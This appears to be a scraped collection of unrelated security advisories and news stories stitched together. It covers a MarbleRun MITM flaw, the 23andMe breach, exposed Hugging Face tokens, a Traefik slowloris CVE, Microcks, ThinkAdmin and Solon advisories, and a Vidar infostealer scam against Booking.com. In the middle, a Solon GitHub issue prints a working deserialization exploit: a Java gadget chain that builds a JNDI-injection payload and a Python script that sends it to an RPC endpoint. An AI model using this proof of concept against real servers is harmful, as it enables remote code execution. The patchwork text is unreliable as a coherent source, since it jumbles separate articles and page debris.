### Impact
Any CLI command issued to a Coordinator after the Manifest has been set, is susceptible to be redirected to another MarbleRun Coordinator instance, which runs the same binary, but potentially a different manifest.

### Patches
 The issue has been patched in [`v1.4.0`](https://github.com/edgelesssys/marblerun/releases/tag/v1.4.0)

### Workarounds

Directly using the REST API of the Coordinator and manually verifying and pinning the certificate to a set Manifest avoids the issue.


Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-j3rq-4xjw-xg63

**Go package github.com/edgelesssys/marblerun CLI commands susceptible to MITM attacks**

High severity GitHub Reviewed Published Dec 4, 2023 in edgelesssys/marblerun • Updated Dec 4, 2023

**Package**

gomod github.com/edgelesssys/marblerun (Go)

**Affected versions**

< 1.4.0

**Description**

**Impact**

Any CLI command issued to a Coordinator after the Manifest has been set, is susceptible to be redirected to another MarbleRun Coordinator instance, which runs the same binary, but potentially a different manifest.

**Patches**

The issue has been patched in v1.4.0

**Workarounds**

Directly using the REST API of the Coordinator and manually verifying and pinning the certificate to a set Manifest avoids the issue.

**References**

*   GHSA-j3rq-4xjw-xg63
*   https://github.com/edgelesssys/marblerun/releases/tag/v1.4.0

Published to the GitHub Advisory Database

Dec 4, 2023

GHSA-j3rq-4xjw-xg63: Go package github.com/edgelesssys/marblerun CLI commands susceptible to MITM attacks

23andMe has released new details about the credential stuffing attack that took place in October.

In October we reported that the data of as many as seven million 23andMe customers were for sale on criminal forums following a password attack against the genomics company.

Now, a filing with the US Securities and Exchange Commission (SEC) has provided some more insight into the data theft. The filed amendment supplements the original Form 8-K submitted by 23andMe.

The amendment says that an investigation showed that the attacker was able to directly access the accounts of roughly 0.1% of 23andMe’s users, which is about 14,000 of its 14 million customers. The attacker accessed the accounts using credential stuffing which is where someone tries existing username and password combinations to see if they can log in to a service. These combinations are usually stolen from another breach and then put up for sale on the dark web. Because people often reuse passwords across accounts, cybercriminals buy those combinations and then use them to login on other services and platforms.

With the breached accounts at their disposal, the attacker used 23andMe’s opt-in DNA Relatives (DNAR) feature—which matches users with their genetic relatives—to access information about millions of other users. According to a spokesperson the DNAR profiles of roughly 5.5 million customers could be accessed in this way, plus the Family Tree profile information of 1.4 million additional DNA Relative participants.

The 5.5 million DNAR Profiles contained sensitive details including self-reported information like display names and locations, as well as shared DNA percentages for DNA Relatives matches, family names, predicted relationships, and ancestry reports.

For a subset of these accounts, the stolen data might contain health-related information based upon the user’s genetics.

The 1.4 million Family Tree profiles contain display names and relationship labels, plus other information that a user may have added, including birth year and location.

23andMe is in the process of notifying users impacted by the incident. The company said it believes that the attacker activity is contained, and that it is working to have the publicly-posted information taken down.

When the breach was first announced, 23andMe urged its users to ensure they have strong passwords, to avoid reusing passwords from other sites, and to enable multi-factor authentication (MFA).

Our Mark Stockley noted at the time:

> “Respectfully, we would like to see 23andMe reach a different conclusion. Telling users to choose strong passwords and not to reuse them is great advice that just isn’t working. It’s good in theory but fails in practice. In a world where users have tens or even hundreds of logins to manage, password reuse and weak passwords that are easy to remember are inevitable.”

And it looks as if they listened to us. On the 23andMe blog the updated article about the breach now says:

> “We have taken steps to further protect customer data, including requiring all existing customers to reset their password and requiring two-step verification for all new and existing customers. The company will continue to invest in protecting our systems and data.”

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your and your family’s personal information by using Malwarebytes Identity Theft Protection.

 23andMe says, er, actually some genetic and health data might have been accessed in recent breach 

Researchers at Lasso Security found 1,500+ tokens in total that gave them varying levels of access to LLM repositories at Google, Microsoft, VMware, and some 720 other organizations.

Source: Robert Way via Shutterstock

Researchers recently were able to get full read and write access to Meta's Bloom, Meta-Llama, and Pythia large language model (LLM) repositories, in a troubling demonstration of the supply chain risks to organizations using these repositories to integrate LLM capabilities into their applications and operations.

The access would have allowed an adversary to silently poison training data in these widely used LLMs, steal models and data sets, and potentially execute other malicious activities that would heighten security risks for millions of downstream users.

**Exposed Tokens on Hugging Face**

That's according to researchers at AI security startup Lasso Security, who were able to access the Meta-owned model repositories using unsecured API access tokens they discovered on GitHub and the Hugging Face platform for LLM developers.

The tokens they discovered for the Meta platforms were among over 1,500 similar tokens they found on Hugging Face and GitHub that provided them with varying degrees of access to repositories belonging to a total of 722 other organizations. Among them were Google, Microsoft, and VMware.

"Organizations and developers should understand Hugging Face and other likewise platforms aren't working \[to secure\] their users exposed tokens," says Bar Lanyado, a security researcher at Lasso. It's up to developers and other users of these platforms to take the necessary steps to protect their access, he says.

"Training is required while working and integrating generative AI- and LLM-based tools in general," he notes. "This research is part of our approach to shine a light on these kinds of weaknesses and vulnerabilities, to strengthen the security of these types of issues."

Hugging Face is a platform that many LLM professionals use as a source for tools and other resources for LLM projects. The company's main offerings include Transformers, an open source library that offers APIs and tools for downloading and tuning pretrained models. The company hosts — in GitHub-like fashion — more than 500,000 AI models and 250,000 data sets, including those from Meta, Google, Microsoft, and VMware. It lets users post their own models and data sets to the platform and to access those from others for free via a Hugging Face API. The company has raised some $235 million so far from investors that include Google and Nvidia.

Given the platform's wide use and growing popularity, researchers at Lasso decided to take a closer look at the registry and its security mechanisms. As part of the exercise, the researchers in November 2023, tried to see if they could find exposed API tokens that they could use to access data sets and models on Hugging Face. They scanned for exposed API tokens on GitHub and on Hugging Face. Initially, the scans returned only a very limited number of results, especially on Hugging Face. But with a small tweak to the scanning process, the researchers were successful in finding a relatively large number of exposed tokens, Lanyado says.

**Surprisingly Easy to Find Exposed Tokens**

"Going into this research, I believed we would be able to find a large amount of exposed tokens," Lanyado says. "But I was still very surprised with the findings, as well as the simplicity \[with\] which we were able to gain access to these tokens."

Lasso researchers were able to access tokens belonging to several top technology companies — including those with a high level of security — and gain full control over some of them, Lanyado says.

Lasso security researchers found a total of 1,976 tokens across both GitHub and Hugging Face, 1,681 of which turned out to be valid and usable. Of this, 1,326 were on GitHub and 370 on Hugging Face. As many as 655 of the tokens that Lasso discovered had write permissions on Hugging Face. The researchers also found tokens that granted them full access to 77 organizations using Meta-Lama, Pythia, and Bloom. "If an attacker had gained access to these API tokens, they could steal companies' models which in some cases are their main business," Lanyado says. An attacker with write privileges could replace the existing models with malicious ones or create an entirely new malicious model in their name.  Such actions would have allowed an attacker to gain a foothold on all systems using the compromised models, or steal user data, and/or spread manipulated information, he notes.

According to Lanyado, Lasso researchers found several tokens associated with Meta, one of which had write permissions to Meta Llama, and two each with write permissions to Pythia and Bloom. The API tokens associated with Microsoft and VMware had read only privileges, but they allowed Lasso researchers to view all of their private data sets and models, he says.

Lasso disclosed its findings to all impacted users and organizations with a recommendation to revoke their exposed tokens and delete them from their respective repositories. The security vendor also notified Hugging Face about the issue.

"Many of the organizations (Meta, Google, Microsoft, VMware and more) and users took very fast and responsible actions," according to Lasso's report. "They revoked the tokens and removed the public access token code on the same day of the report."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Meta AI Models Cracked Open With Exposed API Tokens

Traefik is an open source HTTP reverse proxy and load balancer. When Traefik is configured to use the `HTTPChallenge` to generate and renew the Let's Encrypt TLS certificates, the delay authorized to solve the challenge (50 seconds) can be exploited by attackers to achieve a `slowloris attack`. This vulnerability has been patch in version 2.10.6 and 3.0.0-beta5. Users are advised to upgrade. Users unable to upgrade should replace the `HTTPChallenge` with the `TLSChallenge` or the `DNSChallenge`.

**Impact**

There is a potential vulnerability in Traefik managing the ACME HTTP challenge.

When Traefik is configured to use the HTTPChallenge to generate and renew the Let's Encrypt TLS certificates, the delay authorized to solve the challenge (50 seconds) can be exploited by attackers (slowloris attack).

**Patches**

*   https://github.com/traefik/traefik/releases/tag/v2.10.6
*   https://github.com/traefik/traefik/releases/tag/v3.0.0-beta5

**Workarounds**

Replace the HTTPChallenge with the TLSChallenge or the DNSChallenge.

**For more information**

If you have any questions or comments about this advisory, please open an issue.

CVE-2023-47124: Potential DDoS whith ACME HTTPChallenge

Microcks up to 1.17.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.

**Microcks contains a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download**

Moderate severity GitHub Reviewed Published Dec 4, 2023 to the GitHub Advisory Database • Updated Dec 4, 2023

GHSA-gqj2-324p-vx73: Microcks contains a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download

An arbitrary file upload vulnerability in the component /admin/api.upload/file of ThinkAdmin v6.1.53 allows attackers to execute arbitrary code via a crafted Zip file.

**ThinkAdmin arbitrary file upload vulnerability**

High severity GitHub Reviewed Published Dec 4, 2023 to the GitHub Advisory Database • Updated Dec 8, 2023

GHSA-7gq9-p94f-g5v9: ThinkAdmin arbitrary file upload vulnerability

Ssolon <= 2.6.0 and <=2.5.12 is vulnerable to Deserialization of Untrusted Data.

**Solon is vulnerable to Deserialization of Untrusted Data**

Critical severity GitHub Reviewed Published Dec 4, 2023 to the GitHub Advisory Database • Updated Dec 8, 2023

GHSA-vwgg-2q82-38c5: Solon is vulnerable to Deserialization of Untrusted Data

    

**Microcks - Kubernetes native tool for API Mocking & Testing**

Microcks is a platform for turning your API and microservices assets - _OpenAPI specs_, _AsyncAPI specs_, _gRPC protobuf_, _GraphQL schema_, _Postman collections_, _SoapUI projects_ - into live mocks in seconds.

It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with _Jenkins_, _GitHub Actions_, _Tekton_ and many others through a simple CLI.

**Getting Started**

*   Documentation

To get involved with our community, please make sure you are familiar with the project's Code of Conduct.

**Build Status**

The current development version is 1.8.1-SNAPSHOT. 

**Sonarcloud Quality metrics**

      

**Versions**

Here are the naming conventions we're using for current releases, ongoing development maintenance activities.

Status

Version

Branch

Container images tags

Stable

1.8.0

master

1.8.0, latest

Dev

1.8.1-SNAPSHOT

1.8.x

nightly

Maintenance

1.7.2-SNAPSHOT

1.7.x

maintenance

**How to build Microcks**

The build instructions are available in the contribution guide.

**Thanks to community!**

CVE-2023-48910: GitHub - microcks/microcks: Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀

**Issue Description**

We recently discovered that Solon provides 'Fury' as a serialization and deserialization solution for RPC. However, our research has found that the corresponding component has a security vulnerability. Attackers can execute a JNDI injection attack using a carefully constructed attack payload.

**Vulnerability Localization**

  
The vulnerability is located at line 25 of the org.noear.solon.serialization.fury.FuryActionExecutor class, as shown in the figure above. Although Fury provides a built-in blacklist to defend against potential deserialization attacks, we will next demonstrate how to bypass this blacklist to carry out an attack.

**Vulnerability Reproduction****Configuring the RPC Service**

Issue #145 has already provided a simple configuration for an RPC server. We just need to add the following dependencies in the pom.xml file:

    <dependency>
      <groupId>org.noear</groupId>
      <artifactId>solon.serialization.fury</artifactId>
      <version>2.6.0</version>
    </dependency>
    <dependency>
      <groupId>com.caucho</groupId>
      <artifactId>quercus</artifactId>
      <version>4.0.66</version>
    </dependency>
    

**Configuring a Malicious LDAP Server**

We use ysoserial(https://github.com/frohoff/ysoserial) to set up a malicious LDAP server for subsequent JNDI injection attacks(Note that in this instance, we are demonstrating using the well-known exploit chain CommonsCollections2. To achieve a similar effect, please configure the corresponding dependencies on the RPC server side.).

**Proof of Concept**

We can obtain the serialized data required for the attack through the following PoC (Proof of Concept).

    RegistryContext registryContext = new RegistryContext("127.0.0.1", 8989, null);
    MemoryModel memoryModel = new MemoryModel();
    memoryModel.bind("evil", registryContext);
    ContextImpl context = new ContextImpl("rmi://localhost:8888/8tr4qv", memoryModel, null);
    Constructor c = QBindingEnumeration.class.getDeclaredConstructors()[0];
    c.setAccessible(true);
    ArrayList<String> list = new ArrayList<>();
    list.add("/evil/8tr4qv");
    QBindingEnumeration enumeration = (QBindingEnumeration) c.newInstance(context, list);
    XStringForFSB xString = Reflections.createWithoutConstructor(XStringForFSB.class);
    Reflections.setFieldValue(xString, "m_strCache", "nxjkas");
    
    HashMap map1 = new HashMap();
    HashMap map2 = new HashMap();
    map1.put("yy",enumeration);
    map1.put("zZ",xString);
    map2.put("yy",xString);
    map2.put("zZ",enumeration);
    
    HashMap s = new HashMap();
    setFieldValue(s, "size", 2);
    Class nodeC;
    try {
      nodeC = Class.forName("java.util.HashMap$Node");
    }
    catch ( ClassNotFoundException e ) {
      nodeC = Class.forName("java.util.HashMap$Entry");
    }
    Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
    nodeCons.setAccessible(true);
    
    Object tbl = Array.newInstance(nodeC, 2);
    Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null));
    Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null));
    setFieldValue(s, "table", tbl);
    
    byte[] poc = FuryUtil.fury.serialize(s);
    new FileOutputStream(new File("/tmp/serifury")).write(poc);
    

Subsequently, we can use the Python script below to send the malicious serialized data to the server, completing the exploitation (this Python script is also referenced from Issue #145).

    with open("/tmp/serifury","rb") as f:
        body= f.read()
        print(len(body))
        burp0_url = "http://127.0.0.1:8080/rpc/v1/user/getUser"
        burp0_cookies = {"_jpanonym": "\"OWQ0ZTEzNzBlMWFlYTY2NzhhMDMxOWM5MmYzMjc0MzgjMTY2NTU2NDE1MzAwOCMzMTUzNjAwMCNPR1ZpTkRVd05qWXpZbU0xTkRCaU0yRXlabVpoTlRrek5HUXpabVk1TmpJPQ==\"", "Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a": "1665564182"}
        ct = "application/fury"
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "deflate",
            "Connection": "close", "Content-Type": ct, "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1"}
    
        res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=body, proxies=proxy)
        print(res.text)
    

**Attack Results**

CVE-2023-48967: A new RCE vulnerability · Issue #226 · noear/solon

By Deeba Ahmed
Vidar infostealer is capable of stealing browsing data, including passwords, cryptocurrency wallet credentials, and other personal information.
This is a post from HackRead.com Read the original post: Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

The ‘How To’ guide for targeting Booking.com customers is being offered for sale on the dark web, as well as on underground cybercrime forums, including Russian-speaking platforms such as XSS.IS.

Cybersecurity firm Secureworks is alerting Booking.com customers to a recently identified scam wherein hotels’ Booking.com accounts are compromised to deceive users into divulging their payment details.

This fraudulent activity was detected in October 2023. Researchers have observed that cybercriminals successfully obtained access to hotel login credentials through the utilization of the **Vidar information stealer**.

While this tool is not commonly employed in such scams, in this instance, the Vidar infostealer is utilized to infiltrate the hotel’s Booking.com portal. This unauthorized access enables cybercriminals to peruse upcoming bookings and communicate directly with guests while posing as hotel staff.

Researchers from Secureworks Counter Threat Unit™ (CTU) suspect that this may be part of a broader campaign specifically aimed at targeting Booking.com users. The purloined data is presumed to be traded on underground marketplaces or forums, where it can command a higher price due to the increased potential for defrauding unsuspecting guests.

Characterizing it as a sophisticatedly crafted scam, researchers highlight that the hackers devised an email aimed at gaining the trust of **hotel employees**. The deceptive message purportedly originated from a former guest who reported losing their ID or other valuables, seeking assistance from the hotel staff to locate the items.

The subtlety of this approach meant the employee did not find it suspicious, especially since the email lacked attachments or dubious links, creating the illusion of a genuine request. Consequently, the employee responded and offered assistance.

However, a link within the email, allegedly containing a photo of the lost item, actually served to install the Vidar infostealer. Once activated, this malware illicitly acquires the hotel’s Booking.com login credentials, facilitating unauthorized access to guest reservation details.

The hook in this scam creates a sense of urgency for the guests. The attacker contacts those having reservations at the hotel through Booking.com. Guests receive urgent emails from the hotel demanding immediate payment confirmation to avoid booking cancellation. This doesn’t raise any suspicions.

Rather, it panics the guests, and they click on the provided link. According to Secureworks’ **report**, this leads them to a fake website designed to look like Booking.com, which was created to steal their payment data.

The scammers scam the guests by draining their accounts using the stolen payment data. Moreover, they sell Booking.com credentials on the **Dark Web** for up to $2,000.

The Booking.com phishing email and one of the forums selling Booking.com exploit (Screenshot credit: Secureworks)

Although Booking.com hasn’t been directly breached, the company is cooperating with impacted hotels to improve security and help affected customers. The company emphasized using machine learning to detect suspicious activity and advised hotels and customers to stay vigilant and never provide payment details without verifying the website.

“Due to the rigorous controls and the machine learning capabilities we employ, we can detect and block the overwhelming majority of suspicious activity before it impacts our partners or customers. We have also been sharing additional tips and updates with our partners about what they can do to protect themselves and their businesses, along with the latest information on malware and phishing so that they are as up-to-date as possible on the latest trends that we’re seeing.”

“It’s good to remember that no legitimate transaction will ever require a customer to provide their credit card details by phone, email, or text message (including WhatsApp)”, Booking.com stated.

This incident highlights the evolving tactics of cybercriminals and the importance of vigilance, even for seemingly harmless requests. Hotels should be especially cautious of suspicious emails and enable multi-factor authentication on Booking.com and other platforms to add an extra layer of security.

**Chris Hauk**, Consumer Privacy Advocate at Pixel Privacy, shared his comments with Hackread.com, stating that this scam is designed to target hotels with good reputations.

“This scam preys on hotels that offer good customer service, making the hotel employees believe that they are aiding a customer in retrieving a lost item. This is the first time I’ve heard of scammers taking that approach. The second step in the scam involves using a customer’s Booking.com information to convince the customer that they need to make a payment immediately.”

“Organizations like Booking.com need to work with their partners to ensure that all systems and applications are kept up to date to close security holes. Also, employee training to make them aware of how scammers work is also a must” Hauk added.

****_RELATED ARTICLES_****

1.  **The Benefits Of Blockchain In The Travel Industry**
2.  **Newly Surfaced ThirdEye Infostealer Targeting Windows Devices**
3.  **Fake ChatGPT and AI pages on Facebook are spreading infostealers**
4.  **Hotel reservation platform leaks user data from top online booking sites**
5.  **Hackers steal sensitive data from Japanese search engine for sex hotels**

Tag

#git